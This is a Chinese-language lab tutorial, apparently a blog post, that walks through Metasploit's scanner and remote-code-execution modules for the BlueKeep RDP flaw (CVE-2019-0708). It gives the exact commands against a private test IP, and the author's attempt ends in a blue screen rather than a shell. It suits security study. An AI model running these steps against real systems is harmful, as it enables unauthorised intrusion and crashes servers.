Metasploit -- CVE-2019-0708漏洞检测及利用

简介: Metasploit -- CVE-2019-0708漏洞检测及利用

一、漏洞简介

Windows系列服务器于2019年5月15号, 被爆出高危漏洞, 该漏洞影响范围较广, windows 2003、windows 2008、windows 2008R 2、windowsxp等系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389, RDP协议进行攻击的。CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证, 不用任何的交互, 直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。这个漏洞是今年来说危害严重性最大的漏洞,换句话说,该漏洞是“可传播的”,这意味着任何利用该漏洞的恶意软件都可能从受影响的计算机传播到受影响的计算机,就像2017年Wanna Cry恶意软件在全球蔓延一样, 跟之前的勒索,永恒之蓝病毒差不多。

 

二、漏洞检测

1、打开Metasploit,搜索CVE-2019-0708

image.png

2、选择auxiliary/scanner/rdp/cve_2019_0708_bluekeep,检测漏洞是否存在

3、查看需要设置的参数show options

image.png

4、设置目标主机ip set rhosts 192.168.1.129

5、run,检测出现The target is vulnerable,目标很脆弱,说明存在漏洞

image.png

 

三、漏洞利用

1、选择攻击模块exploit/windows/rdp/cve_2019_0708_bluekeep_rce

2、查看攻击目标的环境show targets

image.png

3、设置模块需要的环境 set target 5

4、查看模块需要的参数 show options

image.png

5、设置攻击目标ip set rhosts 192.168.1.129

6、run,攻击

image.png

 

7、目标主机出现蓝屏

image.png

总结,理论上应该就取得了目标主机的shell,但是我的却是蓝屏,网上有的说多试几次就好,有的说是设置的target问题,都试过了,但是我最终还是没能成功。。。。

禁止非法,后果自负

目录
相关文章
|
2月前
|
缓存 NoSQL Java
Java 防重放攻击实战:从原理到落地
重放攻击(Replay Attack)是一种常见的网络攻击手段,攻击者通过截取网络中传输的合法请求数据(如API调用参数、令牌等),然后在未授权的情况下重复发送该请求,以达到欺骗服务器、获取非法利益的目的。在Java开发中,重放攻击多发生在HTTP接口(尤其是RESTful API)、RPC调用、分布式系统通信等场景。要防御重放攻击,核心思路是让每个合法请求都具备“唯一性”和“时效性”,使攻击者截取的旧请求无法被服务器正常处理。
429 0
|
9月前
|
安全 Unix Linux
Metasploit Pro 4.22.7-2025050101 发布 - 专业渗透测试框架
Metasploit Pro 4.22.7-2025050101 发布 - 专业渗透测试框架
256 10
Metasploit Pro 4.22.7-2025050101 发布 - 专业渗透测试框架
|
安全 Windows
Microsoft Windows远程桌面服务远程执行代码漏洞(CVE-2019-0708)
Microsoft Windows远程桌面服务远程执行代码漏洞(CVE-2019-0708)
720 2
|
存储 安全 JavaScript
XSS跨站脚本攻击详解(包括攻击方式和防御方式)
这篇文章详细解释了XSS跨站脚本攻击的概念、原理、特点、类型,并提供了攻击方式和防御方法。
6615 2
|
安全 Shell Linux
Webshell管理工具:AntSword(中国蚁剑)
中国蚁剑的下载、安装、详细使用步骤
7914 1
|
安全 网络安全 数据库
扫描神器:Nessus 保姆级教程(附步骤)
扫描神器:Nessus 保姆级教程(附破解步骤)
|
Web App开发 网络安全 iOS开发
2021Kali系列 -- 目录扫描(nikto)
2021Kali系列 -- 目录扫描(nikto)
1190 0
|
安全 测试技术 PHP
如何搭建 sqli-labs 靶场保姆级教程(附链接)
如何搭建 sqli-labs 靶场保姆级教程(附链接)
|
网络协议 Shell 网络安全
Windows环境下安装nc工具
本文介绍了网络工具Netcat(nc)的下载、配置和基础使用。首先提供了nc的下载链接,建议在安装时避免中文路径并关闭杀毒软件。接着,展示了配置nc环境变量的步骤,包括在系统设置中进行相关操作。然后,通过开启两个命令行窗口进行简单的验证测试,如监听端口(nc -l -p9000)和建立连接(nc localhost 9000)。最后,提到了nc的多功能性,如端口监听、扫描、文件传输和远程shell,并列出了一些常用参数选项,例如 `-l` (监听模式) 和 `-p` (指定端口)。
5915 0
|
安全 网络安全 Windows
渗透测试-Windows远程桌面服务漏洞(CVE-2019-0708)
渗透测试-Windows远程桌面服务漏洞(CVE-2019-0708)
渗透测试-Windows远程桌面服务漏洞(CVE-2019-0708)